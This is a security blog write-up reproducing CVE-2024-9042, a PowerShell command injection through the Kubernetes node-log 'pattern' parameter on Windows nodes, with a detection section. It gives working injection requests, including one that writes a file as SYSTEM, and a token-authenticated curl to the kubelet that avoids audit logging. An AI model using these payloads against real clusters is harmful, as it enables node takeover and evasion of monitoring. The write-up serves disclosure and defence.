Originally posted by AmberWolf at https://blog.amberwolf.com/blog/2025/january/reproducing-cve-2024-9042—command-injection-in-windows-kubernetes-nodes/

Introduction

Yesterday (16th Jan, 2025) I woke up to an email on the Kubernetes announcements mailing list. The Kubernetes Security Response Committee had published an advisory for CVE-2024-9042, a vulnerability affecting Windows worker nodes that can be exploited by users with the ability to query a node’s /logs endpoint. There didn’t appear to be a detailed writeup available, and it’s been a while since I looked into a vuln like this in detail, so I figured I’d spend a couple of hours diving into the details.

For the avoidance of doubt, this vulnerability was not identified by AmberWolf. As per the original disclosure, attribution is as follows: This vulnerability was reported by Peled, Tomer and mitigated by Aravindh Puthiyaprambil.

Reproduction Steps

At first sight this vulnerability appears to affect functionality which is gated behind the NodeLogQuery feature gate, which has been in Beta since Kubernetes 1.30. As per the documentation, NodeLogQuery “Enables querying logs of node services using the /logs endpoint.”

On my test Windows node running Kubernetes 1.32, the NodeLogQuery behaviour was not enabled by default. Without it, I was able to see a directory listing on the kubelet’s /logs endpoint. This behaviour isn’t new, having existed in the Kubelet for some years now, and has had its own security issues in the past.

❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/"
<!doctype html>
<meta name="viewport" content="width=device-width">
<pre>
<a href="calico/">calico/</a>
<a href="containers/">containers/</a>
<a href="kubelet/">kubelet/</a>
<a href="pods/">pods/</a>
</pre>

However, in my experiments the endpoint didn’t seem to support the ?query parameter mentioned in the advisory. Note that the snippet below shows the same output with and without the query parameter.

❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=kubelet"
<!doctype html>
<meta name="viewport" content="width=device-width">
<pre>
<a href="calico/">calico/</a>
<a href="containers/">containers/</a>
<a href="kubelet/">kubelet/</a>
<a href="pods/">pods/</a>
</pre>

To get a better understanding of the vuln, I looked at the original issue https://github.com/kubernetes/kubernetes/issues/129654, which linked to https://github.com/kubernetes/kubernetes/pull/129595/, a PR which made changes to, you guessed it, the NodeLogQuery feature. At this point I was pretty sure I was on the right track, so I enabled the feature on my test Windows node [1] by making the following changes:

  1. Add --feature-gates='NodeLogQuery=true' to C:\var\lib\kubelet\kubeadm-flags.yaml
  2. Add enableSystemLogHandler: true and enableSystemLogQuery: true to C:\var\lib\kubelet\config
  3. Run restart-service kubelet

The test node was running kubelet v1.32.0 which, until this vuln was announced, was the most recent version available.

The endpoints for this aren’t something I’ve played with before, but the functionality is relatively well detailed in this blog post. By querying /api/v1/nodes/{nodename}/proxy/logs/?query={service}, I can get back the logs for a Windows service.

❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=kubelet"

log not found for kubelet

Admittedly there’s no content in the logs for this service, but we’re getting closer. Trying again with docker as the service [2], I got back some logs:

❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker"

   ProviderName: docker

TimeCreated          Id LevelDisplayName Message                                                                       
-----------          -- ---------------- -------                                                                       
1/14/2025 7:28:06 AM  1 Information      Starting up                                                                   
1/14/2025 7:28:06 AM  1 Information      OTEL tracing is not configured, using no-op tracer provider                   
1/14/2025 7:28:06 AM  1 Information      Windows default isolation mode: process                                       
[...]
1/14/2025 8:31:29 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.
                                         Windows driver requires VNIs to be prepopulated               
1/14/2025 8:31:29 AM  1 Information      Loading containers: done.                                     
1/14/2025 8:31:29 AM 11 Information      Docker daemon [storage-driver=windowsfilter containerd-snapshotter=false
                                         version=27.5.0 commit=38b84dc]                                
1/14/2025 8:31:29 AM  1 Information      Daemon has completed initialization                           
1/14/2025 8:31:29 AM  1 Information      API listen on //./pipe/docker_engine 

By adding &pattern={searchTerm}, I can filter the output to only something that matches the provided pattern. The example below shows only the Error lines.

❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern=Error"
   ProviderName: docker

TimeCreated          Id LevelDisplayName Message                                                                       
-----------          -- ---------------- -------                                                                       
1/14/2025 7:28:07 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 7:28:07 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:29:54 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:29:54 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:31:29 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:31:29 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               

Referencing the git commits which fix this vulnerability, it appears that these parameters are passed to Powershell.exe. Passing user input to an operating system function sounds ripe for command injection. As it looks like Powershell is involved, let’s enable script logging on the node and see exactly what’s being invoked:

[...]
Windows PowerShell transcript start
Start time: 20250116031322
Username: WORKGROUP\SYSTEM
RunAs User: WORKGROUP\SYSTEM
Configuration Name: 
Machine: WIN-QTKTC6OHC3R (Microsoft Windows NT 10.0.20348.0)
Host Application: PowerShell.exe -NonInteractive -ExecutionPolicy Bypass -Command Get-WinEvent -ListProvider kubelet | Format-Table -AutoSize
[...]

As expected, we have a PowerShell command invocation running as WORKGROUP\SYSTEM. Initial attempts to inject into the ListProvider argument (via the query parameter) were rejected, as special characters aren’t permitted. Other parameters include sinceTime and untilTime, which allow filtering based on an RFC3339 timestamp, and the aforementioned pattern. It turns out that the command which actually uses the pattern parameter is only invoked when the service has logs to return, so we’ll return to using docker for the next few examples.

## Request
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern=\$(whoami)"

## Powershell Logs
Host Application: PowerShell.exe -NonInteractive -ExecutionPolicy Bypass -Command Get-WinEvent -FilterHashtable @{LogName='Application'; ProviderName='docker'} | Sort-Object TimeCreated | Where-Object -Property Message -Match '$(whoami)' | Format-Table -AutoSize -Wrap

Perfect, we have our $(whoami) showing in the logs. It’s in quotes, so not evaluated, but we should be able to get around that by adding our own quotes:

# kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern='\$(whoami)'"
Where-Object : A positional parameter cannot be found that accepts argument 'nt authority\system'.
At line:1 char:107
+ ... meCreated | Where-Object -Property Message -Match ''$(whoami)'' | For ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Where-Object], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.WhereObjectCommand

And there we have it. Command execution on the remote host, evidenced by the presence of nt authority\system in the command error.
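To see why the extra quotes matter, here is a minimal sketch that models the command string by plain string interpolation. The function name build_powershell_command is hypothetical and this is not the kubelet's actual Go code; the template is simply copied from the PowerShell transcript above, on the assumption that the pattern is inserted between single quotes without escaping.

```python
def build_powershell_command(service: str, pattern: str) -> str:
    """Hypothetical model of the command seen in the PowerShell transcript.

    Assumption: the pattern is placed between single quotes with no escaping.
    """
    return (
        "Get-WinEvent -FilterHashtable "
        f"@{{LogName='Application'; ProviderName='{service}'}} "
        "| Sort-Object TimeCreated "
        f"| Where-Object -Property Message -Match '{pattern}' "
        "| Format-Table -AutoSize -Wrap"
    )


# Without extra quotes, $(whoami) stays inside a single-quoted literal.
quoted = build_powershell_command("docker", "$(whoami)")

# With attacker-supplied quotes, the literal is closed early and the
# subexpression ends up outside of any quoting.
broken_out = build_powershell_command("docker", "'$(whoami)'")

print(quoted)
print(broken_out)
```

In the second string the -Match argument becomes ''$(whoami)'', which matches the fragment shown in the error message: the subexpression is no longer part of a quoted literal, so PowerShell evaluates it.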

Just in case, as one colleague put it, “seeing a username in an intimidating-sounding Powershell error message doesn’t do it for you”, we can adapt this attack to perform something more dangerous, like writing a file to the Administrator’s desktop:

# Request
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern='\$(Set-Content -Path C:\\\\Users\\Administrator\\Desktop\\test.txt \"pwnd\")'"
Where-Object : A positional parameter cannot be found that accepts argument '$null'.
At line:1 char:107

# On server
PS C:\Users\Administrator> ls .\Desktop\

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/16/2025   9:52 AM              6 test.txt

PS C:\Users\Administrator> type .\Desktop\test.txt
pwnd

Testing Directly on the Kubelet

Up to now I’ve been testing using my cluster-admin credentials. To validate the minimum privileges necessary to perform the attack, I created a clusterrole and clusterrolebinding to grant only the get nodes/log permission to the default:default service account, then communicated directly with the Windows node kubelet from inside a pod, using the pod’s service account token:

root@testpod:/# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" "https://192.168.20.215:10250/logs/?pattern=%27%24%28whoami%29%27&query=docker"
Where-Object : A positional parameter cannot be found that accepts argument 'nt authority\system'.
At line:1 char:107
+ ... meCreated | Where-Object -Property Message -Match ''$(whoami)'' | For ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Where-Object], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.WhereObjectCommand

root@testpod:/# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
globalnetworkpolicies.projectcalico.org         []                                     []               [*]
networkpolicies.projectcalico.org               []                                     []               [*]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
nodes/log                                       []                                     []               [get]

Unsurprisingly, the attack works just as effectively when performed directly against a Kubelet as when proxied through the API Server. Going direct also means the request is excluded from any Kubernetes audit logs, as Kubelet API calls bypass the Kubernetes API Server audit logging almost entirely, with the exception of a SubjectAccessReview being performed to validate credentials.
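The curl request above carries the payload percent-encoded, since the quotes, dollar sign and parentheses would otherwise need escaping in the shell and the URL. As a small sketch using only the Python standard library, the same encodings can be reproduced like this; the variable names are illustrative, and the second payload is the iex variant that appears in the audit log entry in the Detections section.

```python
from urllib.parse import quote, urlencode

payload = "'$(whoami)'"

# quote() with safe="" percent-encodes every reserved character,
# giving the form used in the curl request.
encoded = quote(payload, safe="")
print(encoded)

# urlencode() builds a full query string and encodes spaces as "+",
# which is the form that shows up in the audit log's requestURI.
query_string = urlencode({"pattern": "'$(iex -command whoami)'", "query": "Power"})
print(query_string)
```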

Detections

Speaking of audit logs, I enabled audit logging set to RequestResponse on the cluster to see what these requests look like when proxying through the API Server. The relevant entry is below:

iain@kubemaster01:/etc/kubernetes/manifests$ sudo cat /var/log/kubernetes/audit/audit.log  | grep -i 'logs'
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"2806f063-0a07-4b4d-9146-48ddcf52966f","stage":"ResponseComplete","requestURI":"/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?pattern=%27%24%28iex+-command+whoami%29%27\u0026query=Power","verb":"get","user":{"username":"kubernetes-super-admin","groups":["system:masters","system:authenticated"],"extra":{"authentication.kubernetes.io/credential-id":["X509SHA256=37d5642940d5c44ef25fa0878103944e68f58e2c7a1b743386a5b574e4298c9d"]}},"sourceIPs":["192.168.3.119"],"userAgent":"kubectl/v1.30.5 (linux/amd64) kubernetes/74e84a9","objectRef":{"resource":"nodes","name":"win-qtktc6ohc3r","apiVersion":"v1","subresource":"proxy"},"responseStatus":{"metadata":{},"code":200},"requestReceivedTimestamp":"2025-01-16T18:38:28.879260Z","stageTimestamp":"2025-01-16T18:38:29.938042Z","annotations":{"apiserver.latency.k8s.io/etcd":"661.654µs","apiserver.latency.k8s.io/response-write":"1.16µs","apiserver.latency.k8s.io/total":"1.058782532s","authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}
[...]

Or, made a little more readable, the bit that should be concerning to cluster operators monitoring for this attack:

stage: "ResponseComplete",
requestURI: "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?pattern=%27%24%28iex+-command+whoami%29%27&query=Power",
verb: "get",
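As a rough starting point for monitoring, the sketch below scans audit log lines for node log queries whose decoded pattern parameter contains characters that have no obvious place in a log search. The function name and the SUSPICIOUS_TOKENS list are assumptions of mine rather than an official detection rule, and they will need tuning, since legitimate regular expressions can also contain some of these characters.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Hypothetical heuristic: tokens commonly used to break out of quoting
# or chain commands in PowerShell. Tune this list for your environment.
SUSPICIOUS_TOKENS = ("'", '"', "$(", "`", ";", "|", "&")


def suspicious_log_queries(audit_lines):
    """Yield (username, decoded pattern) for suspicious /proxy/logs requests."""
    for line in audit_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not JSON audit events
        if not isinstance(event, dict):
            continue
        uri = urlsplit(event.get("requestURI", ""))
        if "/proxy/logs" not in uri.path:
            continue
        # parse_qs percent-decodes values and turns "+" back into spaces.
        for pattern in parse_qs(uri.query).get("pattern", []):
            if any(token in pattern for token in SUSPICIOUS_TOKENS):
                username = event.get("user", {}).get("username", "unknown")
                yield username, pattern


sample = json.dumps({
    "requestURI": "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/"
                  "?pattern=%27%24%28iex+-command+whoami%29%27&query=Power",
    "user": {"username": "kubernetes-super-admin"},
})
benign = json.dumps({
    "requestURI": "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern=Error",
    "user": {"username": "kubernetes-super-admin"},
})

hits = list(suspicious_log_queries([sample, benign, "not json"]))
print(hits)
```

Note that this only covers requests proxied through the API Server; requests sent directly to the Kubelet never reach this log.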

Summary

To summarise, the pattern parameter used by the NodeLogQuery feature was being passed directly to PowerShell without filtering. This leaves the endpoint open to command injection by any user or service account with GET permissions on nodes/log, allowing them to execute commands on each Windows node as NT AUTHORITY\SYSTEM. This attack does require authentication, specific RBAC permissions, and network access to the Kubelet on a Windows node which has a non-default feature explicitly enabled by administrators.


  1. Interestingly, the Kubernetes Docs on feature stages suggest that a Beta feature is enabled by default, but this feature is explicitly disabled by default.

  2. Docker wouldn’t typically be available on a Windows Kubernetes node, but I had explicitly installed it alongside containerd to test some different workflows on the same machine. We could use any service which returns logs.